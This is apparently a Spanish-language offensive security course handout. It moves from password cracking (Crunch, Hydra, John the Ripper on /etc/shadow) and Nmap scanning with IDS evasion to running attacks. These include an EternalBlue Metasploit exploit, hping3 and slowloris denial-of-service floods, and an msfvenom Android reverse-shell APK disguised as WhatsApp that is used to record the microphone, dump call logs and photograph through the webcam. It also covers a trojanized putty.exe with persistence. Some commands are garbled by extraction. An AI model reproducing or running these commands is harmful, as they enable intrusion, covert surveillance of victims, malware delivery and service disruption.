Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

La manera más sencilla de ejecutar Crunch es definiendo la longitud mínima (de inicio) y máxima (de fi
n) de la cadena que se desea crear. La opción “-o” o “>” especifica el archivo al cual escribir los resulta
dos.
crunch min max parm > diccionario.txt
-p evita que se repitan los caracteres
-t ingresar frases
% inserta números
@ inserta minúsculas
, inserta mayúsculas
^ inserta caracteres especiales incluido el espacio
Crunch 8 8 –f /usr/share/rainbowcrack/charset.txt mixalpha >…

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Hydra
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Se utiliza diccionario muy completo
Se ataca a puertos

Los mas conocidos y vulnerables ssh, ftp, smtp, web


hydra –h –x

hydra –L lista de usuarios


hydra –P lista de contraseñas
hydra –l usuario especifico

hydra –p contraseña especifica


hydra –l usuario –p contraseña dirección ip nombre del servicio (ssh, ftp, etc)

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
JOHN THE RIPPER

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Decripta el algoritmo criptográfico MD5 - SHA1 - 256

Copiar el archivo de usuarios y passwords a /root


/etc/passwd
/etc/shadow
unshadow /root/usuarios /root/contrase > passuss

1.- john passuss


2.- john passuss --show
We get user and password récords!!!

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Nmap ("Network Mapper") es una herramienta de código abierto para
exploración de red y auditoría de seguridad.
Fue diseñado para escanear rápidamente grandes redes, aunque funciona bien
contra los ejércitos individuales.
Nmap utiliza paquetes IP en bruto en formas novedosas para determinar qué
hosts están disponibles en la red, qué servicios (nombre de la aplicación y
versión) estos equipos ofrecen, qué sistemas operativos (y versiones del
sistema operativo) que se están ejecutando, qué tipo de filtros de paquetes /
cortafuegos están en uso, y docenas de otras características.
Mientras Nmap es comúnmente utilizado para las auditorías de seguridad,
muchos sistemas y administradores de red resulta útil para tareas de rutina,
tales como inventario de red, gestión de horarios de servicios de
actualización y supervisión de host o tiempo de servicio.

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Qué se puede encontrar con NMAP?
Nmap 7.70 ( https://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
1.TARGET SPECIFICATION
2.HOST DISCOVERY
EXAMPLES:
3.SCAN TECHNIQUES
nmap -v -A scanme.nmap.org
4.PORT SPECIFICATION AND SCAN ORDER
nmap -v -sn 192.168.0.0/16 10.0.0.0/8
5.SERVICE/VERSION DETECTION
6.SCRIPT SCAN
nmap -v -iR 10000 -Pn -p 80
7.OS DETECTION
SEE THE MAN PAGE (https://nmap.org/book/man.ht
8.TIMING AND PERFORMANCE ml) FOR MORE OPTIONS AND EXAMPLES
9.FIREWALL/IDS EVASION AND SPOOFING
10.OUTPUT
11.MISC

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Que resultado me dan estas instrucciones?

nmap –iflist

Nmap –sn 192.168.0.0/24 descubrir la red o sn

Nmap –v información completa

Nmap –sT 192.168.0.0/24 descubrir puertos de toda la red (TCP)

Nmap –iL archivo.txt

Nmap 192.168.0.* --exclude 192.168.0.100

Nmap –sA 192.168.0.1 para detectar filtrado firewall

Nmap –PN 192.168.0.1 protección firewall

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Namp –r 192.168.10.1 escaneo rápido

Nmap –p 80 192.168.10.1 especificar puerto

Namp –p T:8888,80 192.168.10.1 especificar puerto y tipo

Nmap –sV 192.168.0.1 Versiones de servicios

Nmap –O 192.168.0.1 descubre S.O.

Nmap –sS 192.168.0.1 –D ip1, ip2, 1ipN

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
1 Escanear un único host o una dirección IP (IPv4)

Escanear una única dirección IP


nmap 192.168.0.1
# # Escanear un nombre de host # # #
nmap server1.cyberciti.biz
# # Escanear un nombre de host con más info # # #
nmap-v server1.cyberciti.biz
-----------------------------------------------------------------------------
2: Lea la lista de hosts / redes desde un archivo (IPv4)

La IL-opción permite leer la lista de sistemas de destino mediante un archivo de texto. Esto es útil para
analizar un gran número de hosts / redes. Cree un archivo de texto:

cat > /tmp/prueba.txt


Salidas de muestra:
server1.cyberciti.biz
192.168.1.0/24
192.168.1.1/24
10.1.2.3
localhost

******* nmap -iL /tmp/ prueba.txt *******

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
3: Escanear varias direcciones IP o subred (IPv4)

nmap 192.168.1.1 192.168.1.2 192.168.1.3


y en la misma subred 192.168.1.0/24
nmap 192.168.1.1,2,3

Escanear un rango de direcciones IP


nmap 192.168.1.1-20
Escanear un rango de direcciones IP utilizando un comodín
nmap 192.168.1. *

Escanear una subred completa:


nmap 192.168.1.0/24

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
4: Exclusión de hosts / redes (IPv4)

Al escanear un gran número de hosts / redes se pueden excluir los hosts

nmap 192.168.1.0/24 - exclude 192.168.1.5


nmap 192.168.1.0/24 - exclude 192.168.1.5,192.168.1.254

Excluir lista desde un archivo llamado /tmp/exclude.txt


nmap -iL /tmp/scanlist.txt - excludefile /tmp/exclude.txt

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
5: Encienda el script de sistema operativo y versión de escaneo

nmap -A 192.168.1.254
nmap -v-A 192.168.1.1
nmap -A-iL /tmp/scanlist.txt

6: Saber si un host / red están protegidos por un cortafuegos

nmap -sA 192.168.1.254


nmap -sA agroscopio.com

7: Escanear un host si está protegido por el firewall

nmap -PN 192.168.1.1


nmap -PN agroscopio.com

8: Escanear un host de IPv6 / dirección

La opción -6 habilitar el análisis de IPv6.

nmap -6 IPv6-Address-aquí
nmap -6 server1.cyberciti.biz
nmap -6 2607: f0d0: 1002:51 :: 4
nmap -v A -6 2607: f0d0: 1002:51 :: 4

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
9: Escanear una red y averiguar qué servidores y dispositivos están
corriendo.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

Esto se conoce como anfitrión descubrimiento o exploración de ping:

nmap -sP 192.168.1.0/24


10: Análisis rápido.

Nmap -F 192.168.1.1

11 Mostrar únicamente los puertos abiertos (o probablemente abiertos):

nmap -open 192.168.1.1


nmap -abierto agroscopio.com

12:Todos los paquetes enviados y recibidos

nmap -packet-trace 192.168.1.1


nmap -packet-trace server1.cyberciti.biz
13: show interfaces de host y rutas

Esto es útil para la depuración (comando ip o comando route o comando


netstat como salida usando nmap)
nmap -iflist
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
14: ¿Cómo puedo escanear puertos específicos?

mapa -p [puerto] hostName


Escanear el puerto 80
nmap -p 80 192.168.0.1
Escanear el puerto TCP 80
nmap -p T: 80 192.168.0.1
Scan UDP puerto 53
nmap -p U: 53 192.168.0.1
Escanear dos puertos
nmap -p 80, 443 192.168.0.1
Escanea rangos de puertos
nmap -p 80 -200 192.168.0.1 Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

Combinar todas las opciones


nmap -p U: 53, 111, 137, T: 21 -25, 80, 139, 8080 192.168 0,1 0,1
nmap -p U: 53, 111, 137, T: 21 -25, 80, 139, 8080 server1.cyberciti.biz
nmap -v-sU-sT-p U: 53, 111, 137, T: 21 -25, 80, 139, 8080 192.168.1.0/24
Analizar todos los puertos con comodín *
nmap -p "*" 192.168.0.1
Escanear puertos principales, es decir $ escanear puertos numéricos más comunes

nmap -top-ports 10 192.168.0.1


Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

15: La forma más rápida para escanear todos los equipos para puerto 19: Escanear un host con serie de PING’s IP
s abiertos a la vez
nmap -PO 192.168.1.1
nmap -T5 192.168.1.0/24
20: Escanear un host que utiliza UDP mesa de ping
16: Detectar el sistema operativo remoto
Este análisis no pasa por firewalls y filtros de pantalla que sólo TCP:
nmap -O 192.168.0.1 nmap -PU 192.168.1.1
nmap -O -osscan-guess 192.168.0.1 nmap -PU 2000.2001 192.168.1.1
nmap -v-O - osscan-guess 192.168.0.1
17: Detectar servicios remotos (servidor / daemon) números de versi 21: Los más utilizados los puertos TCP que utilizan TCP SYN Scan
ón # # # Sigiloso escanear # # #
nmap -sS 192.168 0,1 0,1
Nmap -sV 192.168.1.1 Los más repetitivos que utilizan los puertos TCP TCP connect scan (aviso: no hay exploración sigilo)
# # # OS Fingerprinting # # #
nmap -sT 192.168 0,1 0,1
18: Escanear un host que utiliza TCP ACK (PA) y TCP Syn (PS) de pin
g Los más repetitivos que utilizan los puertos TCP scan TCP ACK
nmap -sA 192.168 0,1 0,1
Si el firewall está bloqueando estándar pings ICMP, pruebe los métodos siguie
ntes descubrimiento de acogida: Los más repetitivos que utilizan los puertos TCP TCP Window scan
nmap -PS 192.168.1.1 nmap -sW 192.168 0,1 0,1
nmap -PS 80,21,443 192.168.1.1
nmap -PA 192.168.1.1 Los más repetitivos que utilizan los puertos TCP TCP Maimon scan
nmap -PA 80,21,200-512 192.168.1.1
nmap -sM 192.168 0,1 0,1

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
22: Escanear un host para servicios UDP (UDP scan)

Mayoría de los servicios populares de Internet se extienden sobre el protocolo TCP. DNS, SNMP y DHCP son tres de los servicios UDP
más comunes. Utilice la sintaxis siguiente para averiguar los servicios UDP:

nmap -sU 192.168.1.1


23: Analizar en busca de protocolo IP
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

Este tipo de análisis permite determinar qué protocolos IP (TCP, ICMP, IGMP, etc) son compatibles con los equipos de destino:
nmap -sO 192.168.1.1

24: Digitalizar un firewall para la debilidad en la seguridad

Los siguientes tipos de exploración explotar una escapatoria sutil en el TCP y bueno para probar la seguridad de los ataques más co
munes:
# # TCP Null Scan para engañar a un servidor de seguridad para generar una respuesta # #
# # No establece ningún bit (encabezado TCP bandera es 0) # #
nmap -sN 192.168 0,1 0.254

# # TCP Fin scan para comprobar firewall # #


# # Establece sólo el bit FIN TCP # #
nmap -sF 192.168 0,1 0.254

# # TCP Xmas escaneado para comprobar firewall # #


# # Establece el FIN, PSH, URG y banderas, encendiendo el paquete como un árbol de Navidad # #
nmap -sX 192.168 0,1 0.254
25: Digitalizar un servidor de seguridad de los fragmentos de paquetes

La opción -f hace que la exploración solicitada (incluyendo las exploraciones ping) a utilizar pequeños paquetes
IP fragmentados. La idea es dividir la cabecera TCP a través de varios paquetes para que sea más difícil para los
filtros de paquetes, sistemas de detección de intrusos y otras molestias para detectar lo que está haciendo.

nmap -f 192.168.1.1
nmap -f fw2.nixcraft.net.in
nmap -f 15 fw2.nixcraft.net.in
# # Establece el tamaño de su propia compensación con la opción - mtu # #
nmap -mtu 32 192.168.1.1
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

26: Capa de un análisis con señuelos

La opción -D que aparecen al host remoto que el host (s) se especifica como señuelos a escanear la red de destin
o también . Así, sus IDS puede informar escaneos de puertos 5-10 de direcciones IP únicas, pero no sabrán qué
IP se escanearlos y que eran señuelos inocentes:

Nmap -n-Ddecoy-IP1, IP2-señuelo, su-propio-ip, señuelo-IP3, IP4-señuelo a distancia-host-ip


nmap -n-D 192.168.1.5, 10.5.1.2,172.1.2.4,3.4.2.1 192.168.1.5
27: Digitalizar un firewall para la falsificación de direcciones MAC

# # # Spoof su dirección MAC # #


nmap -spoof-mac MAC-ADDRESS-HERE 192.168.0.1

# # # Añadir otra opción # # #


nmap -v-sT-PN - spoof-mac MAC-ADDRESS-HERE 192.168.0.1
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

# # # Usar una dirección MAC aleatoria # # #


# # # El número 0, significa nmap elige una dirección MAC completamente al azar # # #
nmap -v-sT-PN -spoof-mac 0 192.168.0.1

28: ¿Cómo puedo guardar la salida en un archivo de texto?

La sintaxis es la siguiente:
nmap 192.168.1.1 > output.txt
nmap -oN /ruta/del/archivo 192.168.1.1
nmap -oN output.txt 192.168.1.1
Es una herramienta para descubrimiento de redes extrayendo muchos detalles de los clientes conectados
dentro y fuera de la misma. Es la versión gráfica de NMAP - Network Mapper
Tiene muchos usos:
-Para bypasear firewalls
-Descubre todo tipo de protección y seguridad
-muestra macs y puertos abiertos
Hay libros, cursos y certificaciones solo dedicados a NMAP y ZENMAP
En el terminal ingresamos zenmap

Ingresamos nuestra dirección ip o la dirección de red (192.168.100.1 o 192.168.100.0/24)

A la derecha en la sección de Profile seleccionamos PING SCAN, intense scan plus UDP, intense scan, all TCP
ports, intense scan, no ping, Quick scan (obtenemos más detalles que Ping) , Quick sacan plus (muestra detalles
del SO y programas que corren los puertos abiertos) , quick traceroute, regular scan, Slow comprenhensive
scan

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
https://nmap.org/nsedoc/
buscamos eternalblue

eternalblue
smb-vuln-ms17-010 Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

find / -name smb-vuln-ms17-010.nse


nmap -d -sC -p 445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.45.129
nmap -p 445 --open --script smb-vuln-ms17-010 192.168.45.129 (VULNERABLE O NO)
nmap --script smb-enum-shares -p 445 192.168.45.129
nmap --script smb-enum-users -p 445 192.168.45.129
nmap --script smb-vuln-ms17-010 -p 445 195.168.45.129
eternalblue
msfconsole Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
options
set rhost 192.168.145.129
exploit
PANTALLAZO AZUL
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set RHOST
exploit
instalar etherape
instalar slowhttptest
arp-scan -l -I eth0

DDOS – ATAQUES A LA INFRAESTRUCTURA


hping3 --rand-source --flood 192.168.44.130
hping3 192.168.44.128 -i -u1 *** atk6-flood_router6 eth0 ***
hping3 192.168.44.128 -i -u1 -d 65000
hping3 -c 10000 -S -w 64 -p 8000 -d 65000 --flood --rand-source 192.168.44.128
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

Instalación de PENTMENU <SLOWLORIS>


wget https://raw.githubusercontent.com/GinJaChris/pentmenu/master/pentmenu
chmod +x pentmenu
./pentmenu
DDOS – ATAQUES AL SERVICIO

slowhttptest
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

slowhttptest -c 1000 -H -g -o attack_stats -i 10 -r 200 -t GET -u http://192.168.44.131


slowhttptest -c 1000 -H -g -o attack_stats -i 10 -r 200 -t GET -u http://192.168.44.131 -x 30 -p 3
slowhttptest -c 1000 -X -g -o slow_read_stats -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://192.168.44.131 -p 3
HACKdroid
msfvenom -p android/meterpreter/reverse_tcp LHOST=182.20.130.102
LPORT=4448 R > /root/whatsapp.apk
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

2.- Escuchar

3.-Instalar en Andriod el apk.

En el servidor en Kali – escucha!


msfconsole
msf5> use exploit/multi/handler
msf5 exploit (handler) > set payload android/meterpreter/reverse_tcp
msf5 exploit (handler) > set LHOST 182.20.130.102
msf5 exploit (handler) > set LPORT 4448
exploit
sessions 1
help
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

GRABAR AUDIO
meterpreter > record_mic -d 20 -f audio.wav -p false

DESCARGAR LISTA DE LLAMADAS


meterpreter > dump_calllog

DESCARGAR LISTA DE MSM


meterpreter > dump_msm
Listado de Cámaras
meterpreter > webcam_list
Cámara frontal. 2 Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

meterpreter > webcam_snap -i 2 -p foto.jpeg -q 0 -v false


Cámara trasera. 1
meterpreter > webcam_snap -i 1 -p foto1.jpeg -q 0 -v false
ENVENENAR UN ACRHIVO EXE

msfvenom -a x86 --platform windows -x /root/putty.exe -k -p windows/meterpreter/reverse_tcp


LHOST=192.168.145.128 LPORT=4443 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o /root/putty-N.exe

msfconsole P
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp E
msf exploit(handler) > set LHOST 192.168.145.128
msf exploit(handler) > set LPORT 4443
R
msf exploit(handler) > run S
luego de ejecutar el archivo . exe en la victima, pasamos a trabajar en la maquina atacante I
meterpreter > getuid S
T
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

****PARA CREAR PERSISTENCIA CON EL ARCHIVO ANTERIOR


E
run persistence -U 5 -i 3 -p 4443 -r 192.168.145.128 N
reiniciamos la maquina victima: C
meterpreter>reboot
....luego de que la victima ya se logoneo... el atacante solo tiene que
I
msf handler>set LPORT 4443
msf handler>run
A
y listo...
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

También podría gustarte